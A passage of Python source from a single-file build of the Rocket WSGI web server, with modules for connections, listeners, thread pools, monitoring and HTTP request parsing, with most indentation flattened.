""" Convert bytes into string/unicode. This allows for the
same code to run on Python 2.x and 3.x. """
if isinstance(val, bytes):
return val.decode(encoding)
else:
return val
else:
def b(val):
""" Convert string/unicode/bytes literals into bytes. This allows for
the same code to run on Python 2.x and 3.x. """
if isinstance(val, unicode):
return val.encode()
else:
return val
def u(val, encoding="us-ascii"):
""" Convert bytes into string/unicode. This allows for the
same code to run on Python 2.x and 3.x. """
if isinstance(val, str):
return val.decode(encoding)
else:
return val
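# A quick illustration of the helpers above (added for clarity; behaves the
# same on Python 2 and 3):
#
#     b('HTTP/1.1 200 OK\r\n')   # -> bytes, safe to pass to socket.send()
#     u(b('hello'))              # -> native text string, equal to 'hello'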
# Import Package Modules
# package imports removed in monolithic build
__all__ = ['VERSION', 'SERVER_SOFTWARE', 'HTTP_SERVER_SOFTWARE', 'BUF_SIZE',
'IS_JYTHON', 'IGNORE_ERRORS_ON_CLOSE', 'DEFAULTS', 'PY3K', 'b', 'u',
'Rocket', 'CherryPyWSGIServer', 'SERVER_NAME', 'NullHandler']
# Monolithic build...end of module: rocket\__init__.py
# Monolithic build...start of module: rocket\connection.py
# Import System Modules
import sys
import time
import socket
try:
import ssl
has_ssl = True
except ImportError:
has_ssl = False
# Import Package Modules
# package imports removed in monolithic build
# TODO - This part is still very experimental.
#from .filelike import FileLikeSocket
class Connection(object):
__slots__ = [
'setblocking',
'sendall',
'shutdown',
'makefile',
'fileno',
'client_addr',
'client_port',
'server_port',
'socket',
'start_time',
'ssl',
'secure',
'recv',
'send',
'read',
'write'
]
def __init__(self, sock_tuple, port, secure=False):
self.client_addr, self.client_port = sock_tuple[1]
self.server_port = port
self.socket = sock_tuple[0]
self.start_time = time.time()
self.ssl = has_ssl and isinstance(self.socket, ssl.SSLSocket)
self.secure = secure
if IS_JYTHON:
# In Jython we must set TCP_NODELAY here since it does not
# inherit from the listening socket.
# See: http://bugs.jython.org/issue1309
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket.settimeout(SOCKET_TIMEOUT)
self.sendall = self.socket.sendall
self.shutdown = self.socket.shutdown
self.fileno = self.socket.fileno
self.setblocking = self.socket.setblocking
self.recv = self.socket.recv
self.send = self.socket.send
self.makefile = self.socket.makefile
# FIXME - this is not ready for prime-time yet.
# def makefile(self, buf_size=BUF_SIZE):
# return FileLikeSocket(self, buf_size)
def close(self):
if hasattr(self.socket, '_sock'):
try:
self.socket._sock.close()
except socket.error:
info = sys.exc_info()
if info[1].args[0] != socket.EBADF:
raise info[1]
else:
pass
self.socket.close()
# Monolithic build...end of module: rocket\connection.py
# Monolithic build...start of module: rocket\filelike.py
# Import System Modules
import socket
try:
from io import StringIO
except ImportError:
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
# Import Package Modules
# package imports removed in monolithic build
class FileLikeSocket(object):
def __init__(self, conn, buf_size=BUF_SIZE):
self.conn = conn
self.buf_size = buf_size
self.buffer = StringIO()
self.content_length = None
if self.conn.socket.gettimeout() == 0.0:
self.read = self.non_blocking_read
else:
self.read = self.blocking_read
def __iter__(self):
return self
def recv(self, size):
while True:
try:
return self.conn.recv(size)
except socket.error:
exc = sys.exc_info()
e = exc[1]
                # Retry on non-blocking/interrupted-call errors (the original
                # FIXME left this set of error codes empty); re-raise the rest.
                if e.args[0] not in (errno.EAGAIN, errno.EWOULDBLOCK,
                                     errno.EINTR):
                    raise
def next(self):
data = self.readline()
if data == '':
raise StopIteration
return data
def non_blocking_read(self, size=None):
# Shamelessly adapted from Cherrypy!
bufr = self.buffer
bufr.seek(0, 2)
if size is None:
while True:
data = self.recv(self.buf_size)
if not data:
break
bufr.write(data)
self.buffer = StringIO()
return bufr.getvalue()
else:
buf_len = self.buffer.tell()
if buf_len >= size:
bufr.seek(0)
data = bufr.read(size)
self.buffer = StringIO(bufr.read())
return data
self.buffer = StringIO()
while True:
remaining = size - buf_len
data = self.recv(remaining)
if not data:
break
n = len(data)
if n == size and not buf_len:
return data
if n == remaining:
bufr.write(data)
del data
break
bufr.write(data)
buf_len += n
del data
return bufr.getvalue()
def blocking_read(self, length=None):
if length is None:
if self.content_length is not None:
length = self.content_length
else:
length = 1
try:
data = self.conn.recv(length)
except:
data = b('')
return data
def readline(self):
data = b("")
char = self.read(1)
        while char != b('\n') and char != b(''):
            data += char
            char = self.read(1)
data += char
return data
def readlines(self, hint="ignored"):
return list(self)
def close(self):
self.conn = None
self.content_length = None
# Monolithic build...end of module: rocket\filelike.py
# Monolithic build...start of module: rocket\futures.py
# Import System Modules
import time
try:
from concurrent.futures import Future, ThreadPoolExecutor
from concurrent.futures.thread import _WorkItem
has_futures = True
except ImportError:
has_futures = False
class Future:
pass
class ThreadPoolExecutor:
pass
class _WorkItem:
pass
class WSGIFuture(Future):
def __init__(self, f_dict, *args, **kwargs):
Future.__init__(self, *args, **kwargs)
self.timeout = None
self._mem_dict = f_dict
self._lifespan = 30
self._name = None
self._start_time = time.time()
def set_running_or_notify_cancel(self):
if time.time() - self._start_time >= self._lifespan:
self.cancel()
else:
return super(WSGIFuture, self).set_running_or_notify_cancel()
def remember(self, name, lifespan=None):
self._lifespan = lifespan or self._lifespan
if name in self._mem_dict:
raise NameError('Cannot remember future by name "%s". ' % name + \
'A future already exists with that name.' )
self._name = name
self._mem_dict[name] = self
return self
def forget(self):
if self._name in self._mem_dict and self._mem_dict[self._name] is self:
del self._mem_dict[self._name]
self._name = None
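# Usage sketch (added for illustration; `executor` is assumed to be the
# WSGIExecutor defined below and `slow_report` is a placeholder callable).
# remember() stores a future in the executor's shared dict so a later request
# can look it up; futures older than `lifespan` seconds are cancelled instead
# of run when a worker picks them up.
#
#     future = executor.submit(slow_report).remember('report', lifespan=60)
#     # ...on a later request:
#     pending = executor.futures.get('report')
#     if pending is not None and pending.done():
#         data = pending.result()
#         pending.forget()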
class _WorkItem(object):
def __init__(self, future, fn, args, kwargs):
self.future = future
self.fn = fn
self.args = args
self.kwargs = kwargs
def run(self):
if not self.future.set_running_or_notify_cancel():
return
try:
result = self.fn(*self.args, **self.kwargs)
except BaseException:
e = sys.exc_info()[1]
self.future.set_exception(e)
else:
self.future.set_result(result)
class WSGIExecutor(ThreadPoolExecutor):
multithread = True
multiprocess = False
def __init__(self, *args, **kwargs):
ThreadPoolExecutor.__init__(self, *args, **kwargs)
self.futures = dict()
def submit(self, fn, *args, **kwargs):
if self._shutdown_lock.acquire():
if self._shutdown:
self._shutdown_lock.release()
raise RuntimeError('Cannot schedule new futures after shutdown')
f = WSGIFuture(self.futures)
w = _WorkItem(f, fn, args, kwargs)
self._work_queue.put(w)
self._adjust_thread_count()
self._shutdown_lock.release()
return f
else:
return False
class FuturesMiddleware(object):
"Futures middleware that adds a Futures Executor to the environment"
def __init__(self, app, threads=5):
self.app = app
self.executor = WSGIExecutor(threads)
def __call__(self, environ, start_response):
environ["wsgiorg.executor"] = self.executor
environ["wsgiorg.futures"] = self.executor.futures
return self.app(environ, start_response)
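# Usage sketch (added for illustration; `my_app` stands in for any WSGI
# callable). Wrapping an app exposes the executor and the named-futures dict
# to every request via the environ keys set in __call__ above:
#
#     app = FuturesMiddleware(my_app, threads=5)
#     # inside a request handler:
#     #     executor = environ['wsgiorg.executor']
#     #     futures = environ['wsgiorg.futures']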
# Monolithic build...end of module: rocket\futures.py
# Monolithic build...start of module: rocket\listener.py
# Import System Modules
import os
import socket
import logging
import traceback
from threading import Thread
try:
import ssl
from ssl import SSLError
has_ssl = True
except ImportError:
has_ssl = False
class SSLError(socket.error):
pass
# Import Package Modules
# package imports removed in monolithic build
class Listener(Thread):
"""The Listener class is a class responsible for accepting connections
and queuing them to be processed by a worker thread."""
def __init__(self, interface, queue_size, active_queue, *args, **kwargs):
Thread.__init__(self, *args, **kwargs)
# Instance variables
self.active_queue = active_queue
self.interface = interface
self.addr = interface[0]
self.port = interface[1]
self.secure = len(interface) >= 4
self.clientcert_req = (len(interface) == 5 and interface[4])
self.thread = None
self.ready = False
# Error Log
self.err_log = logging.getLogger('Rocket.Errors.Port%i' % self.port)
self.err_log.addHandler(NullHandler())
# Build the socket
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if not listener:
self.err_log.error("Failed to get socket.")
return
if self.secure:
if not has_ssl:
self.err_log.error("ssl module required to serve HTTPS.")
return
elif not os.path.exists(interface[2]):
data = (interface[2], interface[0], interface[1])
self.err_log.error("Cannot find key file "
"'%s'. Cannot bind to %s:%s" % data)
return
elif not os.path.exists(interface[3]):
data = (interface[3], interface[0], interface[1])
self.err_log.error("Cannot find certificate file "
"'%s'. Cannot bind to %s:%s" % data)
return
if self.clientcert_req and not os.path.exists(interface[4]):
data = (interface[4], interface[0], interface[1])
self.err_log.error("Cannot find root ca certificate file "
"'%s'. Cannot bind to %s:%s" % data)
return
# Set socket options
try:
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except:
msg = "Cannot share socket. Using %s:%i exclusively."
self.err_log.warning(msg % (self.addr, self.port))
try:
if not IS_JYTHON:
listener.setsockopt(socket.IPPROTO_TCP,
socket.TCP_NODELAY,
1)
except:
msg = "Cannot set TCP_NODELAY, things might run a little slower"
self.err_log.warning(msg)
try:
listener.bind((self.addr, self.port))
except:
msg = "Socket %s:%i in use by other process and it won't share."
self.err_log.error(msg % (self.addr, self.port))
else:
# We want socket operations to timeout periodically so we can
# check if the server is shutting down
listener.settimeout(THREAD_STOP_CHECK_INTERVAL)
# Listen for new connections allowing queue_size number of
# connections to wait before rejecting a connection.
listener.listen(queue_size)
self.listener = listener
self.ready = True
def wrap_socket(self, sock):
try:
if self.clientcert_req:
ca_certs = self.interface[4]
cert_reqs = ssl.CERT_OPTIONAL
sock = ssl.wrap_socket(sock,
keyfile = self.interface[2],
certfile = self.interface[3],
server_side = True,
cert_reqs = cert_reqs,
ca_certs = ca_certs,
ssl_version = ssl.PROTOCOL_SSLv23)
else:
sock = ssl.wrap_socket(sock,
keyfile = self.interface[2],
certfile = self.interface[3],
server_side = True,
ssl_version = ssl.PROTOCOL_SSLv23)
except SSLError:
# Generally this happens when an HTTP request is received on a
# secure socket. We don't do anything because it will be detected
# by Worker and dealt with appropriately.
# self.err_log.error('SSL Error: %s' % traceback.format_exc())
pass
return sock
def start(self):
if not self.ready:
self.err_log.warning('Listener started when not ready.')
return
if self.thread is not None and self.thread.isAlive():
self.err_log.warning('Listener already running.')
return
self.thread = Thread(target=self.listen, name="Port" + str(self.port))
self.thread.start()
def isAlive(self):
if self.thread is None:
return False
return self.thread.isAlive()
def join(self):
if self.thread is None:
return
self.ready = False
self.thread.join()
del self.thread
self.thread = None
self.ready = True
def listen(self):
if __debug__:
self.err_log.debug('Entering main loop.')
while True:
try:
sock, addr = self.listener.accept()
if self.secure:
sock = self.wrap_socket(sock)
self.active_queue.put(((sock, addr),
self.interface[1],
self.secure))
except socket.timeout:
# socket.timeout will be raised every THREAD_STOP_CHECK_INTERVAL
# seconds. When that happens, we check if it's time to die.
if not self.ready:
if __debug__:
self.err_log.debug('Listener exiting.')
return
else:
continue
except:
self.err_log.error(traceback.format_exc())
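# Interface tuples accepted by Listener (summary added for clarity; the file
# names below are placeholders):
#     ('127.0.0.1', 8000)                                  # plain HTTP
#     ('0.0.0.0', 8443, 'key.pem', 'cert.pem')             # HTTPS
#     ('0.0.0.0', 8443, 'key.pem', 'cert.pem', 'ca.pem')   # HTTPS + client certs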
# Monolithic build...end of module: rocket\listener.py
# Monolithic build...start of module: rocket\main.py
# Import System Modules
import sys
import time
import socket
import logging
import traceback
from threading import Lock
try:
from queue import Queue
except ImportError:
from Queue import Queue
# Import Package Modules
# package imports removed in monolithic build
# Setup Logging
log = logging.getLogger('Rocket')
log.addHandler(NullHandler())
class Rocket(object):
"""The Rocket class is responsible for handling threads and accepting and
dispatching connections."""
def __init__(self,
interfaces = ('127.0.0.1', 8000),
method = 'wsgi',
app_info = None,
min_threads = None,
max_threads = None,
queue_size = None,
timeout = 600,
handle_signals = True):
self.handle_signals = handle_signals
self.startstop_lock = Lock()
self.timeout = timeout
if not isinstance(interfaces, list):
self.interfaces = [interfaces]
else:
self.interfaces = interfaces
if min_threads is None:
min_threads = DEFAULTS['MIN_THREADS']
if max_threads is None:
max_threads = DEFAULTS['MAX_THREADS']
if not queue_size:
if hasattr(socket, 'SOMAXCONN'):
queue_size = socket.SOMAXCONN
else:
queue_size = DEFAULTS['LISTEN_QUEUE_SIZE']
if max_threads and queue_size > max_threads:
queue_size = max_threads
if isinstance(app_info, dict):
app_info['server_software'] = SERVER_SOFTWARE
self.monitor_queue = Queue()
self.active_queue = Queue()
self._threadpool = ThreadPool(get_method(method),
app_info = app_info,
active_queue = self.active_queue,
monitor_queue = self.monitor_queue,
min_threads = min_threads,
max_threads = max_threads)
# Build our socket listeners
self.listeners = [Listener(i, queue_size, self.active_queue) for i in self.interfaces]
for ndx in range(len(self.listeners)-1, 0, -1):
if not self.listeners[ndx].ready:
del self.listeners[ndx]
if not self.listeners:
log.critical("No interfaces to listen on...closing.")
sys.exit(1)
def _sigterm(self, signum, frame):
log.info('Received SIGTERM')
self.stop()
def _sighup(self, signum, frame):
log.info('Received SIGHUP')
self.restart()
def start(self, background=False):
log.info('Starting %s' % SERVER_SOFTWARE)
self.startstop_lock.acquire()
try:
# Set up our shutdown signals
if self.handle_signals:
try:
import signal
signal.signal(signal.SIGTERM, self._sigterm)
signal.signal(signal.SIGUSR1, self._sighup)
except:
log.debug('This platform does not support signals.')
# Start our worker threads
self._threadpool.start()
# Start our monitor thread
self._monitor = Monitor(self.monitor_queue,
self.active_queue,
self.timeout,
self._threadpool)
self._monitor.setDaemon(True)
self._monitor.start()
# I know that EXPR and A or B is bad but I'm keeping it for Py2.4
# compatibility.
str_extract = lambda l: (l.addr, l.port, l.secure and '*' or '')
msg = 'Listening on sockets: '
msg += ', '.join(['%s:%i%s' % str_extract(l) for l in self.listeners])
log.info(msg)
for l in self.listeners:
l.start()
finally:
self.startstop_lock.release()
if background:
return
while self._monitor.isAlive():
try:
time.sleep(THREAD_STOP_CHECK_INTERVAL)
except KeyboardInterrupt:
# Capture a keyboard interrupt when running from a console
break
except:
if self._monitor.isAlive():
log.error(traceback.format_exc())
continue
return self.stop()
def stop(self, stoplogging = False):
log.info('Stopping %s' % SERVER_SOFTWARE)
self.startstop_lock.acquire()
try:
# Stop listeners
for l in self.listeners:
l.ready = False
# Encourage a context switch
time.sleep(0.01)
for l in self.listeners:
if l.isAlive():
l.join()
# Stop Monitor
self._monitor.stop()
if self._monitor.isAlive():
self._monitor.join()
# Stop Worker threads
self._threadpool.stop()
if stoplogging:
logging.shutdown()
msg = "Calling logging.shutdown() is now the responsibility of \
the application developer. Please update your \
applications to no longer call rocket.stop(True)"
try:
import warnings
raise warnings.DeprecationWarning(msg)
except ImportError:
raise RuntimeError(msg)
finally:
self.startstop_lock.release()
def restart(self):
self.stop()
self.start()
def CherryPyWSGIServer(bind_addr,
wsgi_app,
numthreads = 10,
server_name = None,
max = -1,
request_queue_size = 5,
timeout = 10,
shutdown_timeout = 5):
""" A Cherrypy wsgiserver-compatible wrapper. """
max_threads = max
if max_threads < 0:
max_threads = 0
return Rocket(bind_addr, 'wsgi', {'wsgi_app': wsgi_app},
min_threads = numthreads,
max_threads = max_threads,
queue_size = request_queue_size,
timeout = timeout)
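# Usage sketch (added for illustration; `hello_app` is a placeholder WSGI
# callable). This mirrors what CherryPyWSGIServer above builds internally:
#
#     def hello_app(environ, start_response):
#         start_response('200 OK', [('Content-Type', 'text/plain')])
#         return [b('Hello, world!')]
#
#     server = Rocket(('127.0.0.1', 8000), 'wsgi', {'wsgi_app': hello_app})
#     server.start()    # blocks; pass background=True to return immediately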
# Monolithic build...end of module: rocket\main.py
# Monolithic build...start of module: rocket\monitor.py
# Import System Modules
import time
import logging
import select
from threading import Thread
# Import Package Modules
# package imports removed in monolithic build
class Monitor(Thread):
# Monitor worker class.
def __init__(self,
monitor_queue,
active_queue,
timeout,
threadpool,
*args,
**kwargs):
Thread.__init__(self, *args, **kwargs)
self._threadpool = threadpool
# Instance Variables
self.monitor_queue = monitor_queue
self.active_queue = active_queue
self.timeout = timeout
self.log = logging.getLogger('Rocket.Monitor')
self.log.addHandler(NullHandler())
self.connections = set()
self.active = False
def run(self):
self.active = True
conn_list = list()
list_changed = False
# We need to make sure the queue is empty before we start
while not self.monitor_queue.empty():
self.monitor_queue.get()
if __debug__:
self.log.debug('Entering monitor loop.')
# Enter thread main loop
while self.active:
# Move the queued connections to the selection pool
while not self.monitor_queue.empty():
if __debug__:
self.log.debug('In "receive timed-out connections" loop.')
c = self.monitor_queue.get()
if c is None:
# A non-client is a signal to die
if __debug__:
self.log.debug('Received a death threat.')
self.stop()
break
self.log.debug('Received a timed out connection.')
if __debug__:
assert(c not in self.connections)
if IS_JYTHON:
# Jython requires a socket to be in Non-blocking mode in
# order to select on it.
c.setblocking(False)
if __debug__:
self.log.debug('Adding connection to monitor list.')
self.connections.add(c)
list_changed = True
# Wait on those connections
if list_changed:
conn_list = list(self.connections)
list_changed = False
try:
if len(conn_list):
readable = select.select(conn_list,
[],
[],
THREAD_STOP_CHECK_INTERVAL)[0]
else:
time.sleep(THREAD_STOP_CHECK_INTERVAL)
readable = []
if not self.active:
break
# If we have any readable connections, put them back
for r in readable:
if __debug__:
self.log.debug('Restoring readable connection')
if IS_JYTHON:
# Jython requires a socket to be in Non-blocking mode in
# order to select on it, but the rest of the code requires
# that it be in blocking mode.
r.setblocking(True)
r.start_time = time.time()
self.active_queue.put(r)
self.connections.remove(r)
list_changed = True
except:
if self.active:
raise
else:
break
# If we have any stale connections, kill them off.
if self.timeout:
now = time.time()
stale = set()
for c in self.connections:
if (now - c.start_time) >= self.timeout:
stale.add(c)
for c in stale:
if __debug__:
# "EXPR and A or B" kept for Py2.4 compatibility
data = (c.client_addr, c.server_port, c.ssl and '*' or '')
self.log.debug('Flushing stale connection: %s:%i%s' % data)
self.connections.remove(c)
list_changed = True
try:
c.close()
finally:
del c
# Dynamically resize the threadpool to adapt to our changing needs.
self._threadpool.dynamic_resize()
def stop(self):
self.active = False
if __debug__:
self.log.debug('Flushing waiting connections')
while self.connections:
c = self.connections.pop()
try:
c.close()
finally:
del c
if __debug__:
self.log.debug('Flushing queued connections')
while not self.monitor_queue.empty():
c = self.monitor_queue.get()
if c is None:
continue
try:
c.close()
finally:
del c
        # Place a None sentinel value to cause the monitor to die.
self.monitor_queue.put(None)
# Monolithic build...end of module: rocket\monitor.py
# Monolithic build...start of module: rocket\threadpool.py
# Import System Modules
import logging
# Import Package Modules
# package imports removed in monolithic build
# Setup Logging
log = logging.getLogger('Rocket.Errors.ThreadPool')
log.addHandler(NullHandler())
class ThreadPool:
"""The ThreadPool class is a container class for all the worker threads. It
manages the number of actively running threads."""
def __init__(self,
method,
app_info,
active_queue,
monitor_queue,
min_threads=DEFAULTS['MIN_THREADS'],
max_threads=DEFAULTS['MAX_THREADS'],
):
if __debug__:
log.debug("Initializing ThreadPool.")
self.check_for_dead_threads = 0
self.active_queue = active_queue
self.worker_class = method
self.min_threads = min_threads
self.max_threads = max_threads
self.monitor_queue = monitor_queue
self.stop_server = False
self.alive = False
# TODO - Optimize this based on some real-world usage data
self.grow_threshold = int(max_threads/10) + 2
if not isinstance(app_info, dict):
app_info = dict()
if has_futures and app_info.get('futures'):
app_info['executor'] = WSGIExecutor(max([DEFAULTS['MIN_THREADS'],
2]))
app_info.update(max_threads=max_threads,
min_threads=min_threads)
self.min_threads = min_threads
self.app_info = app_info
self.threads = set()
def start(self):
self.stop_server = False
if __debug__:
log.debug("Starting threads.")
self.grow(self.min_threads)
self.alive = True
def stop(self):
self.alive = False
if __debug__:
log.debug("Stopping threads.")
self.stop_server = True
# Prompt the threads to die
self.shrink(len(self.threads))
# Stop futures initially
if has_futures and self.app_info.get('futures'):
if __debug__:
log.debug("Future executor is present. Python will not "
"exit until all jobs have finished.")
self.app_info['executor'].shutdown(wait=False)
# Give them the gun
#active_threads = [t for t in self.threads if t.isAlive()]
#while active_threads:
# t = active_threads.pop()
# t.kill()
# Wait until they pull the trigger
for t in self.threads:
if t.isAlive():
t.join()
# Clean up the mess
self.bring_out_your_dead()
def bring_out_your_dead(self):
# Remove dead threads from the pool
dead_threads = [t for t in self.threads if not t.isAlive()]
for t in dead_threads:
if __debug__:
log.debug("Removing dead thread: %s." % t.getName())
try:
# Py2.4 complains here so we put it in a try block
self.threads.remove(t)
except:
pass
self.check_for_dead_threads -= len(dead_threads)
def grow(self, amount=None):
if self.stop_server:
return
if not amount:
amount = self.max_threads
if self.alive:
amount = min([amount, self.max_threads - len(self.threads)])
if __debug__:
log.debug("Growing by %i." % amount)
for x in range(amount):
worker = self.worker_class(self.app_info,
self.active_queue,
self.monitor_queue)
worker.setDaemon(True)
self.threads.add(worker)
worker.start()
def shrink(self, amount=1):
if __debug__:
log.debug("Shrinking by %i." % amount)
self.check_for_dead_threads += amount
for x in range(amount):
self.active_queue.put(None)
def dynamic_resize(self):
if (self.max_threads > self.min_threads or self.max_threads == 0):
if self.check_for_dead_threads > 0:
self.bring_out_your_dead()
queueSize = self.active_queue.qsize()
threadCount = len(self.threads)
if __debug__:
log.debug("Examining ThreadPool. %i threads and %i Q'd conxions"
% (threadCount, queueSize))
if queueSize == 0 and threadCount > self.min_threads:
self.shrink()
elif queueSize > self.grow_threshold:
self.grow(queueSize)
# Monolithic build...end of module: rocket\threadpool.py
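# Sizing sketch with illustrative numbers (the worker class and queue objects
# are assumed to exist): with max_threads=10 the grow_threshold works out to
# int(10 / 10) + 2 == 3, so dynamic_resize() only grows the pool once more
# than three connections are queued, and shrinks by one whenever the active
# queue is empty and the pool is above min_threads.
#
#   pool = ThreadPool(WSGIWorker, app_info={}, active_queue=active_q,
#                     monitor_queue=monitor_q, min_threads=2, max_threads=10)
#   pool.start()            # spawns min_threads workers
#   pool.dynamic_resize()   # called periodically by the Monitor thread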
# Monolithic build...start of module: rocket\worker.py
# Import System Modules
import re
import sys
import socket
import logging
import traceback
from wsgiref.headers import Headers
from threading import Thread
from datetime import datetime
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
try:
from io import StringIO
except ImportError:
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
try:
from ssl import SSLError
except ImportError:
class SSLError(socket.error):
pass
# Import Package Modules
# package imports removed in monolithic build
# Define Constants
re_SLASH = re.compile('%2F', re.IGNORECASE)
re_REQUEST_LINE = re.compile(r"""^
(?P<method>OPTIONS|GET|HEAD|POST|PUT|DELETE|TRACE|CONNECT) # Request Method
\ # (single space)
(
(?P<scheme>[^:/]+) # Scheme
(://) #
(?P<host>[^/]+) # Host
)? #
(?P<path>(\*|/[^ \?]*)) # Path
(\? (?P<query_string>[^ ]+))? # Query String
\ # (single space)
(?P<protocol>HTTPS?/1\.[01]) # Protocol
$
""", re.X)
LOG_LINE = '%(client_ip)s - "%(request_line)s" - %(status)s %(size)s'
RESPONSE = '''\
HTTP/1.1 %s
Content-Length: %i
Content-Type: %s
%s
'''
if IS_JYTHON:
HTTP_METHODS = set(['OPTIONS', 'GET', 'HEAD', 'POST', 'PUT', 'DELETE', 'TRACE', 'CONNECT'])
class Worker(Thread):
"""The Worker class is a base class responsible for receiving connections
and (a subclass) will run an application to process the the connection """
def __init__(self,
app_info,
active_queue,
monitor_queue,
*args,
**kwargs):
Thread.__init__(self, *args, **kwargs)
# Instance Variables
self.app_info = app_info
self.active_queue = active_queue
self.monitor_queue = monitor_queue
self.size = 0
self.status = "200 OK"
self.closeConnection = True
self.request_line = ""
# Request Log
self.req_log = logging.getLogger('Rocket.Requests')
self.req_log.addHandler(NullHandler())
# Error Log
self.err_log = logging.getLogger('Rocket.Errors.'+self.getName())
self.err_log.addHandler(NullHandler())
def _handleError(self, typ, val, tb):
if typ == SSLError:
if 'timed out' in val.args[0]:
typ = SocketTimeout
if typ == SocketTimeout:
if __debug__:
self.err_log.debug('Socket timed out')
self.monitor_queue.put(self.conn)
return True
if typ == SocketClosed:
self.closeConnection = True
if __debug__:
self.err_log.debug('Client closed socket')
return False
if typ == BadRequest:
self.closeConnection = True
if __debug__:
self.err_log.debug('Client sent a bad request')
return True
if typ == socket.error:
self.closeConnection = True
if val.args[0] in IGNORE_ERRORS_ON_CLOSE:
if __debug__:
self.err_log.debug('Ignorable socket Error received...'
'closing connection.')
return False
else:
self.status = "999 Utter Server Failure"
tb_fmt = traceback.format_exception(typ, val, tb)
self.err_log.error('Unhandled Error when serving '
'connection:\n' + '\n'.join(tb_fmt))
return False
self.closeConnection = True
tb_fmt = traceback.format_exception(typ, val, tb)
self.err_log.error('\n'.join(tb_fmt))
self.send_response('500 Server Error')
return False
def run(self):
if __debug__:
self.err_log.debug('Entering main loop.')
# Enter thread main loop
while True:
conn = self.active_queue.get()
if not conn:
# A non-client is a signal to die
if __debug__:
self.err_log.debug('Received a death threat.')
return conn
if isinstance(conn, tuple):
conn = Connection(*conn)
self.conn = conn
if conn.ssl != conn.secure:
self.err_log.info('Received HTTP connection on HTTPS port.')
self.send_response('400 Bad Request')
self.closeConnection = True
conn.close()
continue
else:
if __debug__:
self.err_log.debug('Received a connection.')
self.closeConnection = False
# Enter connection serve loop
while True:
if __debug__:
self.err_log.debug('Serving a request')
try:
self.run_app(conn)
log_info = dict(client_ip = conn.client_addr,
time = datetime.now().strftime('%c'),
status = self.status.split(' ')[0],
size = self.size,
request_line = self.request_line)
self.req_log.info(LOG_LINE % log_info)
except:
exc = sys.exc_info()
handled = self._handleError(*exc)
if handled:
break
else:
if self.request_line:
log_info = dict(client_ip = conn.client_addr,
time = datetime.now().strftime('%c'),
status = self.status.split(' ')[0],
size = self.size,
request_line = self.request_line + ' - not stopping')
self.req_log.info(LOG_LINE % log_info)
if self.closeConnection:
try:
conn.close()
except:
self.err_log.error(str(traceback.format_exc()))
break
def run_app(self, conn):
# Must be overridden with a method that reads the request from the socket
# and sends a response.
self.closeConnection = True
raise NotImplementedError('Overload this method!')
def send_response(self, status):
stat_msg = status.split(' ', 1)[1]
msg = RESPONSE % (status,
len(stat_msg),
'text/plain',
stat_msg)
try:
self.conn.sendall(b(msg))
except socket.error:
self.closeConnection = True
self.err_log.error('Tried to send "%s" to client but received socket'
' error' % status)
#def kill(self):
# if self.isAlive() and hasattr(self, 'conn'):
# try:
# self.conn.shutdown(socket.SHUT_RDWR)
# except socket.error:
# info = sys.exc_info()
# if info[1].args[0] != socket.EBADF:
# self.err_log.debug('Error on shutdown: '+str(info))
def read_request_line(self, sock_file):
self.request_line = ''
try:
# Grab the request line
d = sock_file.readline()
if PY3K:
d = d.decode('ISO-8859-1')
if d == '\r\n':
# Allow an extra NEWLINE at the beginning per HTTP 1.1 spec
if __debug__:
self.err_log.debug('Client sent newline')
d = sock_file.readline()
if PY3K:
d = d.decode('ISO-8859-1')
except socket.timeout:
raise SocketTimeout("Socket timed out before request.")
d = d.strip()
if not d:
if __debug__:
self.err_log.debug('Client did not send a recognizable request.')
raise SocketClosed('Client closed socket.')
self.request_line = d
# NOTE: I've replaced the traditional method of procedurally breaking
# apart the request line with a (rather unsightly) regular expression.
# However, Jython's regexp support is slow enough that it actually takes
# longer to process the regexp than to parse procedurally, so the old
# code is kept here for Jython's sake...for now.
if IS_JYTHON:
return self._read_request_line_jython(d)
match = re_REQUEST_LINE.match(d)
if not match:
self.send_response('400 Bad Request')
raise BadRequest
req = match.groupdict()
for k,v in req.items():
if not v:
req[k] = ""
if k == 'path':
req['path'] = r'%2F'.join([unquote(x) for x in re_SLASH.split(v)])
return req
def _read_request_line_jython(self, d):
d = d.strip()
try:
method, uri, proto = d.split(' ')
if not proto.startswith('HTTP') or \
proto[-3:] not in ('1.0', '1.1') or \
method not in HTTP_METHODS:
self.send_response('400 Bad Request')
raise BadRequest
except ValueError:
self.send_response('400 Bad Request')
raise BadRequest
req = dict(method=method, protocol = proto)
scheme = ''
host = ''
if uri == '*' or uri.startswith('/'):
path = uri
elif '://' in uri:
scheme, rest = uri.split('://')
host, path = rest.split('/', 1)
path = '/' + path
else:
self.send_response('400 Bad Request')
raise BadRequest
query_string = ''
if '?' in path:
path, query_string = path.split('?', 1)
path = r'%2F'.join([unquote(x) for x in re_SLASH.split(path)])
req.update(path=path,
query_string=query_string,
scheme=scheme.lower(),
host=host)
return req
def read_headers(self, sock_file):
try:
headers = dict()
l = sock_file.readline()
lname = None
lval = None
while True:
if PY3K:
try:
l = str(l, 'ISO-8859-1')
except UnicodeDecodeError:
self.err_log.warning('Client sent invalid header: ' + repr(l))
if l == '\r\n':
break
if l[0] in ' \t' and lname:
# Some headers take more than one line
lval += ',' + l.strip()
else:
# HTTP header values are latin-1 encoded
l = l.split(':', 1)
# HTTP header names are us-ascii encoded
lname = l[0].strip().upper().replace('-', '_')
lval = l[-1].strip()
headers[str(lname)] = str(lval)
l = sock_file.readline()
except socket.timeout:
raise SocketTimeout("Socket timed out before request.")
return headers
class SocketTimeout(Exception):
"Exception for when a socket times out between requests."
pass
class BadRequest(Exception):
"Exception for when a client sends an incomprehensible request."
pass
class SocketClosed(Exception):
"Exception for when a socket is closed by the client."
pass
class ChunkedReader(object):
def __init__(self, sock_file):
self.stream = sock_file
self.chunk_size = 0
def _read_header(self):
chunk_len = ""
try:
while "" == chunk_len:
chunk_len = self.stream.readline().strip()
return int(chunk_len, 16)
except ValueError:
return 0
def read(self, size):
data = b('')
chunk_size = self.chunk_size
while size:
if not chunk_size:
chunk_size = self._read_header()
if size < chunk_size:
data += self.stream.read(size)
chunk_size -= size
break
else:
if not chunk_size:
break
data += self.stream.read(chunk_size)
size -= chunk_size
chunk_size = 0
self.chunk_size = chunk_size
return data
def readline(self):
data = b('')
